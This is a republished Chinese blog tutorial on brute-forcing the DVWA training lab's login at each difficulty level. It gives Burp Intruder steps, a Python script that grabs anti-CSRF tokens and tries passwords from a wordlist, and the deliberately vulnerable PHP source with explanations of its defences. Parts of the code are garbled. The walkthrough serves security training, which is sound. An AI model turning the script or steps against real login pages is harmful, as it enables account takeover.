建议使用owaspbwa靶场可以不用搭建dvwa以及其他常用靶场,省去搭建靶场的困扰,但是此靶机靶场较老,并不建议使用 owaspbwa下载地址: OWASP Broken WEB Applications Project downloa
建议使用owaspbwa靶场可以不用搭建dvwa以及其他常用靶场,省去搭建靶场的困扰,但是此靶机靶场较老,并不建议使用
owaspbwa下载地址: OWASP Broken WEB Applications Project download | SourceForge.net
注:owaspbwa的本机用户名root密码owaspbwa,记得看看靶机的ip方便以后使用。dvwa的用户名和密码都为admin(owaspbwa中的dvwa是此,其他的用户名为admin密码为passWord)
利用抓包软件抓包,来不断对单个用户名穷举密码的操作
注:密码本和用户名本里面应当有所谓的用户名和密码
打开burp对此网站抓包,用户和密码就是随便输入,只是为了抓包
将此数据包发送到intruder模块
这里会有几个标出来的字段,直接选择clear,选中需要爆破是username和password的值利用add添加(也可以直接爆破密码)(前提是要知道用户名建议直接admin)
选中paysloads模块,进行设置,直接在payload options选择load去添加字典,或者用add添加单个字段
点击右上角的start attack就行,等待一下就可以
通过status和length筛选可以看到密码
PHPif( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass = md5( $pass ); // Check the database $query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';"; $result = Mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '
' ); if( $result && mysqli_num_rows( $result ) == 1 ) { // Get users details $row = mysqli_fetch_assoc( $result ); $avatar = $row["avatar"]; // Login successful echo "Welcome to the password protected area {$user}
"; echo ""; } else { // Login failed echo "
Username and/or password incorrect.
"; } ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);}?>
就是一个只实现了登入的代码,只是对密码进行md5加密,防止我们通过密码进行SQL注入(可以使用username进行SQL注入),可没有对帐号的登入尝试次数做限制。
与上一难度一样,但是需要设置时停
修改burp的resource pool模块(本模块是修改攻击速度)
按此配置就行,可以试试能不能更快爆破,只要大于网站要求请求时间就可
结果与上面一样(爆破会很慢的,就不放出来了)
phpif( isset( $_GET[ 'Login' ] ) ) { // Sanitise username input $user = $_GET[ 'username' ]; $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); // Sanitise password input $pass = $_GET[ 'password' ]; $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); $pass = md5( $pass ); // Check the database $query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '
' ); if( $result && mysqli_num_rows( $result ) == 1 ) { // Get users details $row = mysqli_fetch_assoc( $result ); $avatar = $row["avatar"]; // Login successful echo "Welcome to the password protected area {$user}
"; echo ""; } else { // Login failed sleep( 2 ); echo "
Username and/or password incorrect.
"; } ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);}?>
这边的代码加上了一个,延迟两秒才能下一个,所以延长了爆破时间,怎加的是时间成本。
mysqli_real_escape_string(string,connection) :函数会对字符串string中的特殊符号(\x00,\n,\r,\,‘,“,\x1a)进行转义,基本可以抵抗SQL注入
建议看看token是否正常,建议用linux
前面一样,修改options下的grep-extract和
找到token
先修改值,在单击refetch response
将payloads下的payload set 改为2
就可以攻击了
Python2.x脚本
from bs4 import BeautifulSoupimport urllib2header={'Host':'127.0.0.1', 'User-Agent':'Mozilla/5.0 (windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,**;q=0.8', 'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', 'Referer':'Http://127.0.0.1/vulnerabilities/brute/', 'cookie':'PHPSESSID=8p4kb7jc1df431lo6qe249quv2; security=high', 'Connection':'close', 'Upgrade-Insecure-Requests':'1' }requrl="http://127.0.0.1/vulnerabilities/brute/" def get_token(requrl,header): response=requests.get(url=requrl,headers=header) print (response.status_code,len(response.content)) soup=BeautifulSoup(response.text,"html.parser") input=soup.fORM.select("input[type='hidden']") #返回的是一个list列表 user_token=input[0]['value'] #获取用户的token return user_token user_token=get_token(requrl,header)i=0for line in open("E:\Password\mima.txt"): requrl="http://127.0.0.1/vulnerabilities/brute/?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token i=i+1 print (i , 'admin' ,line.strip(),end=" ") user_token=get_token(requrl,header) if(i==20): break
这个是参考的(2条消息) DVWA之Brute Force(暴力破解)_谢公子的博客-CSDN博客_dvwa brute force
这个自己跑下吧
' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '
' ); if( $result && mysqli_num_rows( $result ) == 1 ) { // Get users details $row = mysqli_fetch_assoc( $result ); $avatar = $row["avatar"]; // Login successful echo "Welcome to the password protected area {$user}
"; echo ""; } else { // Login failed sleep( rand( 0, 3 ) ); echo "
Username and/or password incorrect.
"; } ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);}// Generate Anti-CSRF tokengenerateSessionToken();?> 前面的防护基础上加上了Anti-CSRF token来抵御CSRF的攻击,使用了stripslashes函数和mysqli_real_esacpe_string来抵御SQL注入和XSS的攻击。由于使用了Anti-CSRF token,每次服务器返回的登陆页面中都会包含一个随机的user_token的值,用户每次登录时都要将user_token一起提交。服务器收到请求后,会优先做token的检查,再进行sql查询。
prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' ); $data->bindParam( ':user', $user, PDO::PARAM_STR ); $data->execute(); $row = $data->fetch(); // Check to see if the user has been locked out. if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) ) { // User locked out. Note, using this method would allow for user enumeration! //echo "
This account has been locked due to too many incorrect logins.
"; // Calculate when the user would be allowed to login again $last_login = strtotime( $row[ 'last_login' ] ); $timeout = $last_login + ($lockout_time * 60); $timenow = time(); // Check to see if enough time has passed, if it hasn't locked the account if( $timenow < $timeout ) { $account_locked = true; // print "The account is locked
"; } } // Check the database (if username matches the password) $data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' ); $data->bindParam( ':user', $user, PDO::PARAM_STR); $data->bindParam( ':password', $pass, PDO::PARAM_STR ); $data->execute(); $row = $data->fetch(); // If its a valid login... if( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) { // Get users details $avatar = $row[ 'avatar' ]; $failed_login = $row[ 'failed_login' ]; $last_login = $row[ 'last_login' ]; // Login successful echo "Welcome to the password protected area {$user}
"; echo ""; // Had the account been locked out since last login? if( $failed_login >= $total_failed_login ) { echo "Warning: Someone might of been brute forcing your account.
"; echo "Number of login attempts: {$failed_login}.
Last login attempt was at: ${last_login}.
"; } // Reset bad login count $data = $db->prepare( 'UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;' ); $data->bindParam( ':user', $user, PDO::PARAM_STR ); $data->execute(); } else { // Login failed sleep( rand( 2, 4 ) ); // Give the user some feedback echo "
Username and/or password incorrect.
Alternative, the account has been locked because of too many failed logins.
If this is the case, please try again in {$lockout_time} minutes.
"; // Update bad login count $data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' ); $data->bindParam( ':user', $user, PDO::PARAM_STR ); $data->execute(); } // Set the last login time $data = $db->prepare( 'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;' ); $data->bindParam( ':user', $user, PDO::PARAM_STR ); $data->execute();}// Generate Anti-CSRF tokengenerateSessionToken();?>
在上一难度的基础上对用户的操作做了限制,当登入失败3此后,账号会锁住15s,同时采用了更为安全的PDO(PHP Data Object)机制防御sql注入,这里因为不能使用PDO扩展本身执行任何数据库操作,而sql注入的关键就是通过破坏sql语句结构执行恶意的sql命令。
来源地址:https://blog.csdn.net/m0_73248913/article/details/128769294
--结束END--
本文标题: dvwa靶场Brute Force(暴力破解)全难度教程(附代码分析)
本文链接: https://lsjlt.com/news/397387.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0